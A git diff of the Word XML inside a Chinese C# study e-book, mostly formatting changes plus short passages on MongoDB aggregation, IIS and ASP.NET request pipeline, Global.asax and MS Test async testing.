-    <w:abstractNumId w:val="42"/>
+    <w:abstractNumId w:val="44"/>
     <w:lvlOverride w:ilvl="0">
       <w:startOverride w:val="1"/>
     </w:lvlOverride>
@@ -54796,7 +56574,7 @@
     </w:lvlOverride>
   </w:num>
   <w:num w:numId="164">
-    <w:abstractNumId w:val="48"/>
+    <w:abstractNumId w:val="50"/>
   </w:num>
   <w:num w:numId="165">
     <w:abstractNumId w:val="32"/>
@@ -54805,22 +56583,28 @@
     <w:abstractNumId w:val="22"/>
   </w:num>
   <w:num w:numId="167">
+    <w:abstractNumId w:val="47"/>
+  </w:num>
+  <w:num w:numId="168">
+    <w:abstractNumId w:val="43"/>
+  </w:num>
+  <w:num w:numId="169">
+    <w:abstractNumId w:val="52"/>
+  </w:num>
+  <w:num w:numId="170">
+    <w:abstractNumId w:val="48"/>
+  </w:num>
+  <w:num w:numId="171">
+    <w:abstractNumId w:val="51"/>
+  </w:num>
+  <w:num w:numId="172">
     <w:abstractNumId w:val="45"/>
   </w:num>
-  <w:num w:numId="168">
+  <w:num w:numId="173">
+    <w:abstractNumId w:val="42"/>
+  </w:num>
+  <w:num w:numId="174">
     <w:abstractNumId w:val="41"/>
-  </w:num>
-  <w:num w:numId="169">
-    <w:abstractNumId w:val="50"/>
-  </w:num>
-  <w:num w:numId="170">
-    <w:abstractNumId w:val="46"/>
-  </w:num>
-  <w:num w:numId="171">
-    <w:abstractNumId w:val="49"/>
-  </w:num>
-  <w:num w:numId="172">
-    <w:abstractNumId w:val="43"/>
   </w:num>
   <w:numIdMacAtCleanup w:val="165"/>
 </w:numbering>
@@ -54854,11 +56638,11 @@
     <w:lsdException w:name="Subtitle" w:qFormat="1"/>
     <w:lsdException w:name="Hyperlink" w:qFormat="1"/>
     <w:lsdException w:name="FollowedHyperlink" w:qFormat="1"/>
-    <w:lsdException w:name="Strong" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:uiPriority="22" w:qFormat="1"/>
     <w:lsdException w:name="Emphasis" w:qFormat="1"/>
     <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
-    <w:lsdException w:name="Normal (Web)" w:qFormat="1"/>
+    <w:lsdException w:name="Normal (Web)" w:uiPriority="99" w:qFormat="1"/>
     <w:lsdException w:name="Normal Table" w:semiHidden="1" w:qFormat="1"/>
     <w:lsdException w:name="No List" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
     <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
@@ -55063,6 +56847,7 @@
   <w:style w:type="paragraph" w:styleId="a3">
     <w:name w:val="Normal (Web)"/>
     <w:basedOn w:val="a"/>
+    <w:uiPriority w:val="99"/>
     <w:qFormat/>
     <w:rsid w:val="00B03F23"/>
     <w:pPr>
@@ -55078,6 +56863,7 @@
   <w:style w:type="character" w:styleId="a4">
     <w:name w:val="Strong"/>
     <w:basedOn w:val="a0"/>
+    <w:uiPriority w:val="22"/>
     <w:qFormat/>
     <w:rsid w:val="00B03F23"/>
     <w:rPr>
@@ -55637,7 +57423,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8ED3342F-AC38-4333-82F0-827EB04F78F1}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{34D67699-27F7-47E2-AB51-F339FDDBE7B0}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -18009,12 +18009,74 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:hint="eastAsia"/>
         </w:rPr>
         <w:t>}</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>Aggreagte pipeLine</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>的优势包括：可以对超过</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>BSON</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>限制（</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>16M</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>）的数据进行处理，</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>2</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>可以分片</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+        <w:t>。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25237,9 +25299,6 @@
           <w:numId w:val="65"/>
         </w:numPr>
         <w:ind w:left="1800"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -25289,9 +25348,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25302,7 +25358,7 @@
         </w:tabs>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:color w:val="0070C0"/>
           <w:sz w:val="24"/>
         </w:rPr>
@@ -25325,9 +25381,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25453,45 +25506,14 @@
         <w:spacing w:after="240"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
-          <w:spacing w:val="1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
           <w:spacing w:val="1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>IIS识别不同类型的请求，然后交给不同的应用程序处理，若找不到此类型的处理程序，且请求的文件没有收到服务器保护，则IIS直接把请求的文件返回给客户端。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:after="240"/>
-        <w:jc w:val="left"/>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
-          <w:spacing w:val="1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:after="240"/>
-        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
           <w:spacing w:val="1"/>
@@ -25499,8 +25521,15 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-      </w:pPr>
-      <w:r>
+        <w:t>IIS识别不同类型的请求，然后交给不同的应用程序处理，若找不到此类型的处理程序，且请求的文件没有收到服务器保护，则IIS直接把请求的文件返回给客户端。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
           <w:spacing w:val="1"/>
@@ -25508,8 +25537,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>我们先来了解下第2点中的HTTP.SYS服务到底是个什么东西，它其实是一个服务器内置驱动程序，用来监听来自外部的HTTP请求，在操作系统启动时IIS服务器首先就要在HTTP.SYS中注册自己的虚拟路径，其实是告知HTTP.SYS请求的URL是否可以访问，能访问则交给IIS，不能则返回404错误。</w:t>
-      </w:r>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25533,7 +25561,7 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。</w:t>
+        <w:t>我们先来了解下第2点中的HTTP.SYS服务到底是个什么东西，它其实是一个服务器内置驱动程序，用来监听来自外部的HTTP请求，在操作系统启动时IIS服务器首先就要在HTTP.SYS中注册自己的虚拟路径，其实是告知HTTP.SYS请求的URL是否可以访问，能访问则交给IIS，不能则返回404错误。</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25550,6 +25578,31 @@
           <w:szCs w:val="18"/>
         </w:rPr>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+        <w:t>接下来解释下第4点中IIS是依据什么来处理请求的，答案就是请求文件的后缀名，能够处理各种后缀名的应用程序被叫做ISAPI（Internet Server Application Programe Interface，互联网服务器应用程序接口）应用程序，它其实是一个接口，扮演一个代理的角色，映射请求的页面的后缀和与之对应的应用程序。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -25558,9 +25611,6 @@
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
         <w:ind w:left="1440"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25570,9 +25620,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25582,9 +25629,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25594,9 +25638,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25606,9 +25647,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25618,9 +25656,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25630,9 +25665,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25642,9 +25674,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25654,9 +25683,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25666,9 +25692,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25680,7 +25703,7 @@
         </w:tabs>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:color w:val="0070C0"/>
           <w:spacing w:val="1"/>
           <w:szCs w:val="18"/>
@@ -25716,21 +25739,21 @@
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
-          <w:spacing w:val="1"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:spacing w:val="1"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:spacing w:val="1"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
         <w:t>上面是在比较低的层次上讲到的IIS和asp.net框架所完成的工作，那我们写的代码（高层次框架，如WebForm、MVC、WebAPI等）是如何和这部分进行衔接的呢？当Http请求到达asp.net runtime时，交由管道来处理，管道由托管模块（各种HttpModule）和处理程序（各种HttpHandler）组成，控制管道工作的是HttpApplication，下面是管道处理的一个图：</w:t>
       </w:r>
     </w:p>
@@ -25742,12 +25765,13 @@
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
+          <w:noProof/>
           <w:spacing w:val="1"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
@@ -25797,9 +25821,6 @@
           <w:tab w:val="left" w:pos="720"/>
           <w:tab w:val="left" w:pos="2880"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25900,30 +25921,14 @@
         <w:spacing w:after="240"/>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体" w:hint="eastAsia"/>
-          <w:spacing w:val="1"/>
-          <w:kern w:val="0"/>
-          <w:sz w:val="18"/>
-          <w:szCs w:val="18"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
           <w:spacing w:val="1"/>
           <w:kern w:val="0"/>
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
-        <w:t>HttpHandler处理完成后，Http请求会再次回到Module，此时Module则可以做一些某个实际工作完成后的事情。</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:widowControl/>
-        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        <w:spacing w:after="240"/>
-        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
           <w:spacing w:val="1"/>
@@ -25931,6 +25936,22 @@
           <w:sz w:val="18"/>
           <w:szCs w:val="18"/>
         </w:rPr>
+        <w:t>HttpHandler处理完成后，Http请求会再次回到Module，此时Module则可以做一些某个实际工作完成后的事情。</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        <w:spacing w:after="240"/>
+        <w:jc w:val="left"/>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:cs="宋体"/>
+          <w:spacing w:val="1"/>
+          <w:kern w:val="0"/>
+          <w:sz w:val="18"/>
+          <w:szCs w:val="18"/>
+        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -25961,9 +25982,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26013,9 +26031,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26042,9 +26057,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26093,9 +26105,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
     </w:p>
     <w:p>
@@ -26104,9 +26113,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26121,9 +26127,6 @@
         <w:tabs>
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -26176,6 +26179,16 @@
         <w:spacing w:line="480" w:lineRule="auto"/>
         <w:outlineLvl w:val="2"/>
         <w:rPr>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
+          <w:b/>
+          <w:color w:val="0070C0"/>
+          <w:sz w:val="22"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
           <w:b/>
           <w:color w:val="0070C0"/>
@@ -26183,7 +26196,8 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>ASP.NET</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
@@ -26193,7 +26207,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>ASP.NET</w:t>
+        <w:t>全局文件</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26204,7 +26218,7 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>全局文件</w:t>
+        <w:t>GLOBAL.ASAX</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -26215,17 +26229,6 @@
           <w:szCs w:val="20"/>
           <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
         </w:rPr>
-        <w:t>GLOBAL.ASAX</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
-          <w:b/>
-          <w:color w:val="0070C0"/>
-          <w:sz w:val="22"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
         <w:t>用法</w:t>
       </w:r>
     </w:p>
@@ -26236,7 +26239,7 @@
           <w:tab w:val="left" w:pos="4320"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
           <w:color w:val="4F4F4F"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -26925,9 +26928,6 @@
           <w:numId w:val="66"/>
         </w:numPr>
         <w:ind w:left="2250"/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -27009,7 +27009,7 @@
         </w:tabs>
         <w:jc w:val="left"/>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="微软雅黑" w:eastAsia="微软雅黑" w:hAnsi="微软雅黑"/>
           <w:sz w:val="20"/>
         </w:rPr>
       </w:pPr>
@@ -27062,7 +27062,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:color w:val="333333"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -27088,7 +27088,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:color w:val="333333"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -27146,7 +27146,7 @@
           <w:tab w:val="left" w:pos="3600"/>
         </w:tabs>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
           <w:color w:val="333333"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
@@ -57423,7 +57423,7 @@
 </file>
 
 <file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
-<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{34D67699-27F7-47E2-AB51-F339FDDBE7B0}">
+<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{8FD34C45-EF18-4EB7-B1C1-DA5477574A9D}">
   <ds:schemaRefs>
     <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
   </ds:schemaRefs>

--- a/EBook/C#技术栈.docx
+++ b/EBook/C#技术栈.docx
@@ -18009,9 +18009,6 @@
     <w:p>
       <w:pPr>
         <w:widowControl/>
-        <w:rPr>
-          <w:rFonts w:hint="eastAsia"/>
-        </w:rPr>
       </w:pPr>
       <w:r>
         <w:rPr>
@@ -37061,16 +37058,554 @@
           <w:numId w:val="123"/>
         </w:numPr>
         <w:ind w:left="1350"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
-          <w:color w:val="333333"/>
-          <w:sz w:val="20"/>
-          <w:szCs w:val="20"/>
-          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
-        </w:rPr>
-        <w:t>...</w:t>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">MS Test </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>如何测试异步方法呢？</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:widowControl/>
+        <w:tabs>
+          <w:tab w:val="left" w:pos="720"/>
+          <w:tab w:val="left" w:pos="2160"/>
+        </w:tabs>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t xml:space="preserve">   </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
+        <w:t>我们只需为异步方法添加</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:cs="Verdana" w:hint="eastAsia"/>
+          <w:color w:val="333333"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
+        </w:rPr>
